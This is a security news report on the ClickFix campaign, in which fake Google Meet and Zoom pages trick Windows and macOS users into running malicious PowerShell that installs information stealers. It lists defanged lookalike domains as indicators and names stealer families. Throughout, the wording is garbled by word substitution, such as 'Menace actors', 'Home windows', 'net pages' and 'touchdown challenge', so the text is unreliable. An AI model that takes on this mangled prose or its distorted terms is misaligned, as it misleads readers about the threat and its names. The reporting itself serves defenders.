Menace actors are leveraging faux Google Meet net pages as a part of an ongoing malware marketing campaign dubbed ClickFix to ship infostealers focusing on Home windows and macOS methods.
“This tactic includes displaying faux error messages in net browsers to deceive customers into copying and executing a given malicious PowerShell code, lastly infecting their methods,” French cybersecurity firm Sekoia mentioned in a report shared with The Hacker Information.
Variations of the ClickFix (aka ClearFake and OneDrive Pastejacking) marketing campaign have been reported extensively in latest months, with menace actors using totally different lures to redirect customers to bogus pages that intention to deploy malware by urging web site guests to run an encoded PowerShell code to handle a supposed subject with displaying content material within the net browser.
These pages are recognized to masquerade as widespread on-line providers, together with Fb, Google Chrome, PDFSimpli, and reCAPTCHA, and now Google Meet in addition to doubtlessly Zoom –
- meet.google.us-join[.]com
- meet.googie.com-join[.]us
- meet.google.com-join[.]us
- meet.google.web-join[.]com
- meet.google.webjoining[.]com
- meet.google.cdm-join[.]us
- meet.google.us07host[.]com
- googiedrivers[.]com
- us01web-zoom[.]us
- us002webzoom[.]us
- web05-zoom[.]us
- webroom-zoom[.]us
On Home windows, the assault chain culminates within the deployment of StealC and Rhadamanthys stealers, whereas Apple macOS customers are served a booby-trapped disk picture file (“Launcher_v1.94.dmg”) that drops one other stealer generally known as Atomic.
This rising social engineering tactic is notable for the truth that it cleverly evades detection by safety instruments, because it includes the customers manually working the malicious PowerShell command immediately on the terminal, versus being mechanically invoked by a payload downloaded and executed by them.
Sekoia has attributed the cluster impersonating Google Meet to 2 traffers teams, specifically Slavic Nation Empire (aka Slavice Nation Land) and Scamquerteo, that are sub-teams inside markopolo and CryptoLove, respectively.
“Each traffers groups […] use the identical ClickFix template that impersonates Google Meet,” Sekoia mentioned. “This discovery means that these groups share supplies, also referred to as ‘touchdown challenge,’ in addition to infrastructure.”
This, in flip, has raised the likelihood that each the menace teams are making use of the identical, as-yet-unknown cybercrime service, with a third-party seemingly managing their infrastructure.
The event comes amid the emergence of malware campaigns distributing the open-source ThunderKitty stealer, which shares overlaps with Skuld and Kematian Stealer, in addition to new stealer households named Expose, DedSec (aka Doenerium), Duck, Vilsa, and Yunit.
“The rise of open-source infostealers represents a big shift on this planet of cyber threats,” cybersecurity firm Hudson Rock famous again in July 2024.
“By reducing the barrier of entry and fostering speedy innovation, these instruments may gas a brand new wave of laptop infections, posing challenges for cybersecurity professionals and rising the general danger to companies and people.”
